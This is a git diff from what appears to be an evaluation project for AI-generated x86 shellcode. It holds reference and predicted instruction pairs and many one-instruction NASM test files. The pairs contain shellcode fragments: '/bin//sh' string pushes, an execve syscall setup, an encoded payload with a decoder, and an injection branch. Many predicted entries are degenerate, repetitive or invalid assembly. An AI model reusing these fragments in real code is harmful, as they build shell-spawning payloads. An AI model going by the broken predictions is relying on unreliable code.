eax, 0x69622f +cmp ax, bx \\n jne l3 \\n jmp while;cmp ax, bx \\n jne while +lea edi, [esi];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov edi, esp +L4: \\n jmp short esp;L4: \\n jmp short stack +jmp short setup;jmp short _setup +zero1e:;_zero1e: +int 80h;call sys_read +xor ecx, ecx \\n mul ecx;xor eax, eax \\n xor edx, edx +mul ebx;xor eax, eax +inc cl;inc cl \\n inc cl +push ebx \\n push ebx \\n push esi;push ebx \\n push esi +test eax, eax \\n jnz checkforfile;test eax, eax \\n jz checkforfile +mov cl,0x2;mov cl, 2 +rol edx, 0x4;rol edx, 4 +mov edi, edx;mov edi, edi +xor ebx,eax;xor ebx, ebx \\n xor eax, eax +lea edi, [esi +1];mov edi, [esi] +F2: \\n call function_1;F2: \\n call function1 +int 0x80;init: +cmp eax, ebx \\n je all;cmp eax, ebx \\n jne all +scasd;cmp eax, dword [edi] \\n not dword [edi] +test eax, eax \\n jz write \\n xor eax, eax;test eax, eax \\n jz write +inc ebx \\n push ebx;push 1 +word1 word 65535;word1: db 65535 +mov ebx, 4;mov eax, 0x68732f2f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x +test eax, eax \\n js _while_loop;test eax, eax \\n jns _while_loop +jne encodedshellcode;jz _encodedshellcode +push ebx;push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f +cld;xor ecx, ecx \\n mul ecx +cmp al, 0xf2 \\n jz _start;cmp al, 0xf2 \\n jge _start +cmp cl, 0x11 \\n jb 0xff \\n add dl, 0x5;cmp cl, 0x11 \\n jl 0xff \\n add dl, 0x5 +mov byte [esi + 1], dl;mov [esi+1], dl +section .text;section +mov al, 15;mov byte [eax], 15 +push eax;push edx +lea ecx, [esp];mov ecx, esp +lea ecx, [zero_reg+117];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ecx, esp +mov dword [esp-0x24], 0x732f636f;mov dword [0x732f636f], 0x732f636f +cmp eax, ebx;cmp ebx, eax +section .text \\n _start:;section .data, _start +dec byte dl;dec dl +jmp callpop;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f +mov eax, 2;mov eax, 0x68732f2f \\n mov eax, 0x6e69622f +mov al, 0x5;mov al, 0x68732f2f \\n mov al, 0x6e69622f +mul ebx;xor eax, eax +neg eax;not eax +push 0x04020a0a;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f +lea ebx, [ebp+39];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ebx, esp +jmp short shellcode_section;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f +ja write;jge write +mov ecx, esp;push trasnfer \\n pop ecx +pop ebx;push byte 0x68732f2f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov ebx, esp +mov ecx, esp;pop ecx +mov eax, 0x50905090;push byte 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x5090509050905090 \\n push 0x5090 +jmp nextchar;jmp code +cmp eax,ebx \\n je exit;cmp eax, ebx \\n je _exit +zero1b:;_zero1b: +mov eax, 65;mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f +xor edx, edx \\n mul edx;xor eax, eax \\n mul eax +push 0x68732f2f \\n push 0x68732f2f \\n push 0x2f656c2d;push ' -le///sh//sh' +scasd \\n l1 IncAddr;cmp DWORD [eax], edi \\n jne l1 +_ip equ 0x0100007f;ip equ 0x0100007f +xor eax, eax \\n mov ebx, eax \\n mov ecx, eax \\n mov edx, eax;xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx +mov byte [esi + 1], dl;mov dl, byte [esi+1] +push 0xb \\n pop eax;push __nr_execve \\n pop eax +or eax, 0xffffffff \\n not eax \\n push eax;mov eax, value -1 \\n not eax +call decoder \\n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01;jmp shellcode +ja exi;jge exi +mov edx, dword 0x65676760;mov edx, 0x65676760 +sub eax, 3;dec eax +_file:;_file_label: +int 0x80;int 80h +cmp BYTE al, 2 \\n je do_inject;cmp al, 2 \\n jne do_inject +je exit;jne exit +push eax \\n mov edx,esp;"push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x +" diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_102.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_102.asm new file mode 100644 index 0000000000000000000000000000000000000000..eb3192b3f739ebdbd0b5f8a0ddc2704df81f28ff --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_102.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_102.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_102.obj new file mode 100644 index 0000000000000000000000000000000000000000..1e2cc8f3d51d8a832a3743edc6268f6ea372e49f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_102.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_109.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_109.asm new file mode 100644 index 0000000000000000000000000000000000000000..879cd0738c7efa812560895b7b16b545f4d2e9b1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_109.asm @@ -0,0 +1,13 @@ +section .data + +write equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + call write + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_109.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_109.obj new file mode 100644 index 0000000000000000000000000000000000000000..843e3c07d24ef6e60f32dacc08061985796dac09 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_109.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_11.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_11.asm new file mode 100644 index 0000000000000000000000000000000000000000..00f2b09c448df8babe5bcf0939284a48d787bca9 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_11.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_11.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_11.obj new file mode 100644 index 0000000000000000000000000000000000000000..7eb0cd6005a03dcc1c4b542ad36f85701f9a18a0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_11.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_111.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_111.asm new file mode 100644 index 0000000000000000000000000000000000000000..472948b8edc50832f6dd22bff5110ef7f5165162 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_111.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg ebx, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_111.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_111.obj new file mode 100644 index 0000000000000000000000000000000000000000..e536a334448448f57865013eb825a7cd8e3e21fa Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_111.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_112.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_112.asm new file mode 100644 index 0000000000000000000000000000000000000000..4db35e9a0f87c2e904b70b60b10b2c74ff60e55a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_112.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ecx, esp + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_112.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_112.obj new file mode 100644 index 0000000000000000000000000000000000000000..ca18c1154f6e38159965e30aaaea6abaeaa58b3e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_112.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_115.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_115.asm new file mode 100644 index 0000000000000000000000000000000000000000..a92db5b91c4c044a34369641cbc11bc60efbb00d --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_115.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ecx, [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_115.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_115.obj new file mode 100644 index 0000000000000000000000000000000000000000..d014eb165cce794e43a414dbf28a65c1898ed2ed Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_115.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_118.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_118.asm new file mode 100644 index 0000000000000000000000000000000000000000..c39bf4c91cef453b9e212bba6044926a01beafe4 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_118.asm @@ -0,0 +1,13 @@ +section .data + +len equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov cl, len + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_118.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_118.obj new file mode 100644 index 0000000000000000000000000000000000000000..50b7d01e2b5b52664ae6074470bb8a7877d47537 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_118.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_122.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_122.asm new file mode 100644 index 0000000000000000000000000000000000000000..650c99507abab23efada17f806f517bf0ec577a7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_122.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 11 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_122.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_122.obj new file mode 100644 index 0000000000000000000000000000000000000000..b8b79952fb3aa32f886c2de8a742bd8815d4d018 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_122.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_126.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_126.asm new file mode 100644 index 0000000000000000000000000000000000000000..cca0ebc9dea6a420e49bf10f2bdac55c00c1e051 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_126.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jmp edi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_126.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_126.obj new file mode 100644 index 0000000000000000000000000000000000000000..c1f0c13aa27baf6b4181976ed248ff3b8ff6c08d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_126.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_128.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_128.asm new file mode 100644 index 0000000000000000000000000000000000000000..0cdc48608cf622102c49eec6835366b0a80479a1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_128.asm @@ -0,0 +1,13 @@ +section .data + +_start equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jae _start-0x24 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_128.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_128.obj new file mode 100644 index 0000000000000000000000000000000000000000..b560920d7c3c1f22671eb7b0543fe42959c5e021 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_128.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_129.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_129.asm new file mode 100644 index 0000000000000000000000000000000000000000..6c22b416841dbd5aa37c5b706e979a69430c33fa --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_129.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_129.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_129.obj new file mode 100644 index 0000000000000000000000000000000000000000..c561bb3bdadb42295e074084e3d24b91f1e0de30 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_129.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_13.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_13.asm new file mode 100644 index 0000000000000000000000000000000000000000..122bcc3fa27960322814cb1e2a5886e17f360da2 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_13.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + section .bss + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_13.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_13.obj new file mode 100644 index 0000000000000000000000000000000000000000..7cada845e519d93dcbfa1420b30fa1dec64634ee Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_13.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_133.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_133.asm new file mode 100644 index 0000000000000000000000000000000000000000..e679b308cae1aa01060f4d536798e1f4ce994034 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_133.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov [1000h], ax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_133.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_133.obj new file mode 100644 index 0000000000000000000000000000000000000000..11249027a886180e3ddcc0011998e92b7242bcfb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_133.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_136.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_136.asm new file mode 100644 index 0000000000000000000000000000000000000000..f959e0bc84be3bda2baec3c4158ff10718016686 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_136.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov ebx, type var3 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_137.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_137.asm new file mode 100644 index 0000000000000000000000000000000000000000..a2a1ff8278b87918e1b756b975f76d8a70c6cdfe --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_137.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + open: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_137.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_137.obj new file mode 100644 index 0000000000000000000000000000000000000000..f90e0eab89f2ead121816e96566ca5858ffc113f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_137.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_139.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_139.asm new file mode 100644 index 0000000000000000000000000000000000000000..14dcebc8a1333c9d09ccae93944ea908c031076f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_139.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + switch: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_139.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_139.obj new file mode 100644 index 0000000000000000000000000000000000000000..139dcece4bbbc8ed4385e8da618de1c7e93d3233 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_139.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_140.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_140.asm new file mode 100644 index 0000000000000000000000000000000000000000..0159f8a9d9fe63640ab562def4e81d9d0e6cc23b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_140.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte al, 0xa4 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_140.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_140.obj new file mode 100644 index 0000000000000000000000000000000000000000..4e0bbaac15265a3183f85e53fd08ba636b787df4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_140.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_142.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_142.asm new file mode 100644 index 0000000000000000000000000000000000000000..57f83c67a11f86dc5888313e78fa07df07a9eba5 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_142.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0xb + pop eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_142.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_142.obj new file mode 100644 index 0000000000000000000000000000000000000000..1f4718f5e5fa2bb4df19ea2eb8d3b52a5aafd010 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_142.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_143.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_143.asm new file mode 100644 index 0000000000000000000000000000000000000000..02d266872a01503e7ac999163e6642545ea58b77 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_143.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0xb + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_143.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_143.obj new file mode 100644 index 0000000000000000000000000000000000000000..119d08a36cdab5408f154dc9973ebd704d3f5aa7 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_143.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_144.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_144.asm new file mode 100644 index 0000000000000000000000000000000000000000..645b99f47650f3a35eff224571b47251c9665886 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_144.asm @@ -0,0 +1,15 @@ +section .data + +while equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp BYTE al, 2 + je do_inject + jmp while + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_146.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_146.asm new file mode 100644 index 0000000000000000000000000000000000000000..f99e45a0fd0a7165dec8320c926f940133163803 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_146.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x10 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_146.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_146.obj new file mode 100644 index 0000000000000000000000000000000000000000..900ee96e291c0b3494c07969796f928967860cc3 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_146.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_148.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_148.asm new file mode 100644 index 0000000000000000000000000000000000000000..c9cb6dcf0aad14d3bc7ef4a02508578f37feaad7 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_148.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x58 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_148.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_148.obj new file mode 100644 index 0000000000000000000000000000000000000000..d40bbd68f4efe113030f60a4a38a9899452647de Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_148.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_149.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_149.asm new file mode 100644 index 0000000000000000000000000000000000000000..acfdd77d5215e711e9168dfb30c57eed7ebe51a6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_149.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, eax + push eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_149.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_149.obj new file mode 100644 index 0000000000000000000000000000000000000000..6e74b9fae352e66f43704f0e0d15f7625f255bf0 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_149.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_15.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_15.asm new file mode 100644 index 0000000000000000000000000000000000000000..e8fb31dfe5fc6e3e0d16f5cbfa9650b13d749496 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_15.asm @@ -0,0 +1,13 @@ +section .data + +y equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, [y] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_15.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_15.obj new file mode 100644 index 0000000000000000000000000000000000000000..ea7b7c33433b0ab62c285e92a4e325971b461da9 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE 